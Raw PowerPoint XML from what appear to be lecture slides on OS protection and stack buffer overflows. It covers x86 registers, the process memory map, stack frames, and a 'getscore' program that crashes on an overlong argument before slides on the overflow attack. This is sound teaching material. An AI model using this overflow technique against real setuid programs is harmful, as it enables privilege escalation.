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319" r:id="rId3"/>
    <p:sldId id="320" r:id="rId4"/>
    <p:sldId id="313" r:id="rId5"/>
    <p:sldId id="291" r:id="rId6"/>
    <p:sldId id="292" r:id="rId7"/>
    <p:sldId id="314" r:id="rId8"/>
    <p:sldId id="296" r:id="rId9"/>
    <p:sldId id="297" r:id="rId10"/>
    <p:sldId id="293" r:id="rId11"/>
    <p:sldId id="267" r:id="rId12"/>
    <p:sldId id="273" r:id="rId13"/>
    <p:sldId id="275" r:id="rId14"/>
    <p:sldId id="277" r:id="rId15"/>
    <p:sldId id="298" r:id="rId16"/>
    <p:sldId id="299" r:id="rId17"/>
    <p:sldId id="300" r:id="rId18"/>
    <p:sldId id="305" r:id="rId19"/>
    <p:sldId id="304" r:id="rId20"/>
    <p:sldId id="302" r:id="rId21"/>
    <p:sldId id="303" r:id="rId22"/>
    <p:sldId id="306" r:id="rId23"/>
    <p:sldId id="307" r:id="rId24"/>
    <p:sldId id="308" r:id="rId25"/>
    <p:sldId id="309" r:id="rId26"/>
    <p:sldId id="317" r:id="rId27"/>
    <p:sldId id="315" r:id="rId28"/>
    <p:sldId id="316" r:id="rId29"/>
    <p:sldId id="279" r:id="rId30"/>
    <p:sldId id="287" r:id="rId31"/>
    <p:sldId id="280" r:id="rId32"/>
    <p:sldId id="321" r:id="rId33"/>
    <p:sldId id="310" r:id="rId34"/>
    <p:sldId id="311" r:id="rId35"/>
    <p:sldId id="312" r:id="rId36"/>
    <p:sldId id="32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4544"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="192" d="100"/>
          <a:sy n="192" d="100"/>
        </p:scale>
        <p:origin x="14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B940D4-392A-7540-B91C-5C3F1EFE3322}" type="datetime1">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>8/29/16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F6761E-9741-CE40-830D-05E65B059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89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52BE80-3EB0-ED47-8F7B-298BBB726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139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C05908-B492-7046-A283-998E7A17FCD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04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393C142-9087-424B-BD13-D7C29D898A1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25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FFC24C-2E63-7245-A44D-286E94EC40A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5BA561-2699-6148-946C-E91B3F1E629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3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87D4B39-9C20-1149-B635-396415E1266F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69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A48A4-6664-304B-9C49-0ECBEAD15E6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30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DDAD0C-EC9B-0F45-BD9C-E855302A74B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0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DE9994E-0B0C-1A41-B185-F536FA53A4A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43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74E50E-C59D-884D-8136-50F063CD437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4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DFED63-F7F9-F149-BDCA-123AB86798C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8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5D1F3A-34E7-2A40-BDEA-A746BE08BA6C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20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7E31D-895A-0045-B948-65366DEE2C6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3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D32E91E-5BF0-9644-8D45-EF1D7E8779E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Push EBP is done by the callee before allocating a new frame for the function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP"/>
              <a:t>s local variables. Similarly, restoring EBP is also done by the callee.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584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96C9B46-7A1F-CB41-889B-95428A6E2F1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861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73E68A-5579-9E46-A576-1730A77F952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C7CCFB-8250-5641-98F6-ABE1F5251A5A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780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0FF718F-4F95-F748-97B9-9B4C91D8347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2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0ECFCF4-302D-1A46-B7C1-105890D5740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716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10DEB3-6CC3-0344-83D9-28588D94A2B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44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E253510-FE4D-E544-A414-B5116E845011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11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83EF936-A077-7243-9027-7D4BD7704C7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48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1CFA8-FEC0-2F48-ADB3-31F4C6B59D6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11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9E7FAC-CDAA-E345-B53A-A0754095C03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Show the case when setuid bit is not present.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="186549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6A46E1-5AE6-5E4E-9821-A8C86DE36D9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3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91ABB0-A354-9941-964C-31703CE8ECE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74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6FA20F-0160-2F46-8652-A69F834355B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6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FB485B-E776-BA4B-B64F-2F3B6F9E380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6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E6CA9-0E5F-7A41-A342-0240E7143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6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3CFE6-8125-DA47-98A2-B54EA4684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3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FFCF8-DBE3-C047-A18B-74F30684A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E5455-C58A-A34D-9FE2-C765B923E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7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68FA3-2D22-FC4B-8F5B-C6F31B1BD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0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45766-F9C1-CB47-85BE-74071188E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1BFCD-601F-0344-8190-B898292D3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79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C9D02-E8F8-384C-9615-D197BE629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56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6D08D-2867-0A41-9F29-2EF4C7FA8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AEE72-17E5-D948-A590-6AA9DE37A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8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64E7C-6358-A146-958D-A7060004F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B2C2DC1-7603-7547-AB41-9331A5943F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Protection and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6CA9-0E5F-7A41-A342-0240E714378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81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your score</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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09600" y="2270125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[simon@localhost]$ ./getscore "Mary Doe" 123-45-6789</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Your score is A+</a:t>
            </a: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609600" y="3717925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[xou@localhost course_scores]$ ./getscore "Tom Smith" 567-89-1234</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Your score is B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609600" y="50292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[root@localhost]$ ./getscore "Mary Doe" 123-45-7890</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Invalid user name or SSN.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7B4EE8-AF53-4E4F-BAA1-E906BE08694F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problems in getscore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First things first: analyze the threat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Who are the adversaries? What are they after?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are the potential risks and their implications?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would you mitigate the risk?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F6BF1A8-1BE5-3945-9D00-74EE84FE93EA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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP"/>
              <a:t>s try this</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/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85800" y="1812925"/>
            <a:ext cx="7467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[simon@localhost getscore]$ ./getscore "Mary Doe" AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Segmentation fault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676400" y="4343400"/>
            <a:ext cx="510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There is a vulnerability in the getscore program!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667B51-8E30-3044-BDA1-1F1947F679DD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32-bit x86 CPU registers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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EAX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676400" y="2133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accumulator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4495800" y="17526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ESP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4572000" y="2133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stack pointer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EBX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6764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base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600200" y="34290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ECX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counter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600200" y="42672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EDX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1676400" y="4648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data</a:t>
            </a:r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4495800" y="25908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EBP</a:t>
            </a:r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45720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base pointer</a:t>
            </a:r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4495800" y="34290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ESI</a:t>
            </a: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4572000" y="3810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source index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495800" y="42672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EDI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31761" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="4648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destination index</a:t>
            </a:r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3048000" y="51054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EIP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3352800" y="54864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instruction pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31764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C75881-D1C9-1649-B87E-4231B917D591}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="14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2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3260725" y="1752600"/>
            <a:ext cx="2971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3794" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3260725" y="609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.text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3260725" y="990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.data</a:t>
            </a:r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3260725" y="1371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heap allocated data</a:t>
            </a:r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3232150" y="19526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33798" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3260725" y="2590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stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33799" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4540250" y="23622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&lt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33800" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4540250" y="18288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&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33801" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3260725" y="3048000"/>
            <a:ext cx="2971800" cy="762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local variables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33802" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3260725" y="454025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function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800"/>
              <a:t>s arguments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33803" name="Text Box 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3260725" y="381000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saved EBP</a:t>
            </a:r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3263900" y="4175125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saved EIP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3263900" y="4916488"/>
            <a:ext cx="2971800" cy="64611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main() local variables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33806" name="Text Box 31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3886200" y="63388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bottom of stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33807" name="Text Box 33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="2819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ESP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33808" name="Text Box 35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="19812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EBP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33809" name="Line 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667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37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667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AutoShape 40"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="746125" y="1295400"/>
            <a:ext cx="533400" cy="4419600"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 20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3812" name="Text Box 41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1203325" y="1447800"/>
            <a:ext cx="54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address growth</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33813" name="Text Box 42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="3962400"/>
            <a:ext cx="220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function’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s return address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3814" name="Line 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5410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48"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="0"/>
            <a:ext cx="2971800" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200"/>
              <a:t>Linux process memory map</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33816" name="Text Box 49"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3265488" y="5562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argc, **argv, **envp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33817" name="Text Box 51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3265488" y="5943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environment var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800"/>
              <a:t>s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Line Callout 2 34"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6400800" y="2351088"/>
            <a:ext cx="1143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stack frame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048000" y="2994025"/>
            <a:ext cx="3429000" cy="8810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3820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EA328F5-3542-0F41-ABF8-79D98A5A451D}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1400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3584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3584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DA2C5B3-0038-0146-820A-0424DBA8D87A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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="35844" name="Group 35"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="1524000"/>
            <a:ext cx="3341688" cy="4800600"/>
            <a:chOff x="5017197" y="609600"/>
            <a:chExt cx="4355403" cy="5715000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35846" name="Rectangle 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396036" y="1752600"/>
              <a:ext cx="2971800" cy="32112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6396036" y="443349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35851" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7562799" y="420489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35852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35853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35854" name="Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5017197" y="4601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35855" name="Text Box 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5072836" y="534063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35856" name="Line 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5802312" y="4918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37"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5802312" y="5553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3585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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35845" name="Right Arrow 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="27432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37890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1981200" y="2789238"/>
            <a:ext cx="990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push s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3789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DB25F-946D-6C4F-82FC-6C1F5907D8C7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7893" name="Right Arrow 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="28956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37894" name="Group 30"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="1524000"/>
            <a:ext cx="3341688" cy="4800600"/>
            <a:chOff x="5017197" y="609600"/>
            <a:chExt cx="4355403" cy="5715000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37897" name="Rectangle 34"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396036" y="1752600"/>
              <a:ext cx="2971800" cy="28484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3789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37901" name="Text Box 14"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396036" y="4070633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7562799" y="3842033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37904" name="Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5017197" y="4221824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37905" name="Text Box 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5072836" y="534063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37906" name="Line 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5802311" y="4539324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37"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5802312" y="5553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3790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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37895" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5934075" y="4826000"/>
            <a:ext cx="2281238" cy="3683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function argument</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37896" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5937250" y="5141913"/>
            <a:ext cx="2279650" cy="5429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main() local vars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39940" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="19050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2438400" y="2941638"/>
            <a:ext cx="1600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push return EIP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="39942" name="AutoShape 10"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipV="1">
            <a:off x="3386137" y="2713038"/>
            <a:ext cx="619125" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -2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58F043-CDA1-A144-8443-AA3C2E95ED0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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39944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6396037" y="1782838"/>
              <a:ext cx="2971800" cy="23948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9950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39951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39952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39954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39956" name="Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5116512" y="393456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39957" name="Text Box 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5116512" y="532674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39958" name="Line 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5802312" y="416316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37"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5802312" y="55553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39961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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39945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5934075" y="4125913"/>
            <a:ext cx="2281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top of stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39947" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6829425" y="3933825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&lt;</a:t>
            </a:r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5937250" y="5141913"/>
            <a:ext cx="2279650" cy="5429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main() local vars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41986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198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DEFA24C-E505-E44C-B067-1A66E83F9DDD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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="41989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1992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993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41994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41998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41999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42000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42001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42002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42003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42004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42005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42008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42009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41990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267200" y="2514600"/>
            <a:ext cx="13716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push EBP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allocate a new frame for local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buffer overflow attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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403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6066945-F88F-FE4D-A5A1-995CBD018C5B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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="44037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4039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44043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44044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44045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44046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44047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44048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44049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44050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44051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44052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44055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44056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44038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“principals” share the same set of  resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Principal: a term we use to refer to a person, a process, a device, etc., for security analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When sharing resources, principals may interfere with each other, e.g., reading/writing to files, communicating with network, using the CPU, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The purpose of protection is to ensure principals will not interfere with each other in an undesirable way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Who provides protection?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Normally the operating system, with some hardware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455-C58A-A34D-9FE2-C765B923E1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3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from a function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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release the function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s frame and restore the saved EBP</a:t>
            </a:r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4608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E4EA78B-6DA4-C24F-86E4-0924AF717B9A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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="46086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46095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46096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46097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46098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46099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46100" name="Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5116512" y="3966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46101" name="Line 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5802312" y="41946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46103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6395200" y="3047546"/>
              <a:ext cx="2973261" cy="7616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smtClean="0"/>
                <a:t>local variables</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46105" name="Text Box 15"/>
